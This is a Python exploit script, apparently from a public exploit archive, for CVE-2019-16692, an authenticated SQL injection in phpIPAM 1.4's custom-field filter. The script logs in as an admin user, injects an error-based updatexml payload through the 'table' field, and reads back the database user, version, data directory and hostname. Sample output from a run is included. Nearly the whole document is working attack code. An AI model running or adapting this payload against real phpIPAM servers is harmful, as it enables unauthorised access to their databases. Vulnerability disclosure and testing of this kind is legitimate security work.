Share
#!/usr/bin/env python3  
# Exploit Title: phpIPAM Custom Field Filter SQL Injection  
# Exploit Announcement Date: September 16, 2019 5:18 AM  
# Exploit Creation Date: September 27, 2019  
# Exploit Author: Kevin Kirsche  
# Vendor Homepage: https://phpipam.net  
# Software Link: https://github.com/phpipam/phpipam/archive/1.4.tar.gz  
# Version: 1.4  
# Tested on: Ubuntu 18.04 / MariaDB 10.4  
# Requires:  
# Python 3  
# requests package  
# CVE: CVE-2019-16692  
  
# For more details, view:  
# https://github.com/phpipam/phpipam/issues/2738  
# https://github.com/kkirsche/CVE-2019-16692  
  
# Example Output  
# [+] Executing select user()  
# [*] Received: phpipam@172.18.0.4  
# [+] Executing select system_user()  
# [*] Received: phpipam@172.18.0.4  
# [+] Executing select @@version  
# [*] Received: .4.8-MariaDB-1:10.4.8+maria~b  
# [+] Executing select @@datadir  
# [*] Received: /var/lib/mysq  
# [+] Executing select @@hostname  
# [*] Received: ubuntu  
  
  
from requests import Session  
  
host = "localhost"  
login_url = f"http://{host}/app/login/login_check.php"  
exploit_url = f"http://{host}/app/admin/custom-fields/filter-result.php"  
  
credentials = {  
"ipamusername": "Admin",  
"ipampassword": "Password",  
}  
  
payload = {  
"action": "add",  
"table": "",  
}  
  
  
cmds = {  
"unpriv": [  
"select user()",  
"select system_user()",  
"select @@version",  
"select @@datadir",  
"select @@hostname",  
]  
}  
  
if __name__ == "__main__":  
client = Session()  
resp = client.post(login_url, data=credentials)  
if resp.status_code == 200:  
for cmd in cmds["unpriv"]:  
print(f"[+] Executing {cmd}")  
payload["table"] = f"users`where 1=(updatexml(1,concat(0x3a,({cmd})),1))#`"  
resp = client.post(exploit_url, data=payload)  
info = resp.text.lstrip("<div class='alert alert-danger'>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':").rstrip("'</div><div class='alert alert-success'>Filter saved</div>")  
print(f"[*] Received: {info}")